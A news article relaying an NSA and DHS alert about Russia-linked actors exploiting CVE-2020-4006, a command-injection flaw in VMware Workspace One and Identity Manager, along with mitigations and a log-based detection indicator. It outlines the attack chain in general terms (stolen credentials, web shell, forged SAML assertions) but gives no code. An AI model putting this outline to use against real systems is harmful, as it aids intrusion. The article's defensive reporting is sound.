tostphoto - stock.adobe.com

NSA Warns Nation-State Actors Exploiting Remote Work Endpoints

Nation-state threat actors from Russia are using stolen credentials to actively exploit a recently disclosed vulnerability in certain VMWare Workspace platforms, used for remote work.

The NSA released an alert that warns all organizations to apply recommended mitigation measures for a vulnerability found in certain VMWare Workspace platforms. Nation-state actors with ties to Russia are actively exploiting the remote work platforms to gain access to enterprise networks.

Disclosed in late November, the command-injection vulnerability, CVE-2020-4006, is found in the administrative configurator of certain VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector platforms.

If exploited, a remote attacker with valid credentials and access to the administrative configurator on port 8443 could execute commands with unrestricted privileges on the targeted operating system.

VMWare ranked the vulnerability as “important severity” and a base score of 7.2 out of 10. Officials further noted that the vRealize Suite Lifecycle Manager and VMware Cloud Foundation employ some of the impacted components, and the mitigations should be applied to these platforms, as well.

“This account is internal to the impacted products and a password is set at the time of deployment,” VMWare officials explained in the disclosure. “A malicious actor must possess this password to attempt to exploit CVE-2020-4006.”

However, the Department of Homeland Security and the NSA alert warn that threat actors are already exploiting the vulnerability with stolen credentials to gain access to protected data on the affected systems.

In the observed exploits, NSA found the hackers gain access through the command injection, which led to a web shell installation and further malicious activity, for those attackers that leveraged credentials in the form of SAML authentication assertions generated and sent to the Microsoft Active Directory Federation Services (ADFS).

In doing so, the hackers were provided access to protected data.

NSA and DHS urged entities to apply the patch provided by VMWare on December 3 to avoid falling victim. If a software update cannot be performed, organizations should ensure they’ve employed strong and unique passwords to lower the risk of exploit.

“Setting the password to a strong unique password would make it more difficult to exploit, but would likely not mitigate an existing compromise,” the alert warned. “It is critical when running products that perform authentication that the server and all the services that depend on it are properly configured for secure operation and integration.” 

“Otherwise, SAML assertions could be forged, granting access to numerous resources,” it added. “If integrating authentication servers with ADFS, NSA recommends following Microsoft’s best practices, especially for securing SAML assertions and requiring multi-factor authentication.”

Administrators should also ensure the web-based management interface is not accessible from the internet, while reviewing and hardening configurations and monitoring federated authentication providers.

Entities were previously encouraged to apply a recommended workaround to secure the configurator hosted on port 8443, which NSA also shared. The workaround disables the configurator service, which blocks critical portions of this malicious activity.

The impact will be limited to the functionality performed by the service, meaning “configurator-managed setting changes will not be possible while the workaround is in place.” The workaround will also inhibit most of the system diagnostics dashboard from being displayed.

Notably, network-based indicators are unlikely to be effective in detecting an exploit of the flaw, as the malicious activity occurs exclusively inside of an encrypted TLS tunnel connected to the web interface.

Instead, administrators should review servers logs, which may provide indications that the VMWare flaw was exploited, such as “the presence of an ‘exit’ statement followed by any 3-digit number, such as ‘exit 123’, within the configurator.log.”

“Other commands along with encoded scripts may also be present,” according to the alert. “If such logs are detected, incident response actions should be followed. Additional investigation of the server, especially for web shell malware, is recommended.”

“Regularly monitor authentication logs for anomalous authentications, especially successful ones that leverage established trusts but that come from unusual addresses or contain unusual properties,” it added.

As attackers must have access to authenticated password-based access to the management interface, which is encrypted with TLS, to exploit the flaw, NSA recommended that system admins limit the accessibility of the management interface to just a small subset of known systems and block it from direct internet access.

The NSA alert comes on the heels of several other reports that found nation-state actors are targeting healthcare entities and others tied to the COVID-19 response with phishing and other cyberattacks. A previous alert showed Russian threat actors were actively targeting vulnerable email systems.

A recent alert warned that Chinese nation-state threat actors were targeting organizations through unpatched vulnerabilities, spotlighting the need to remediate these endpoint flaws to prevent falling victim to an attack.

Next Steps

Dig Deeper on Cybersecurity strategies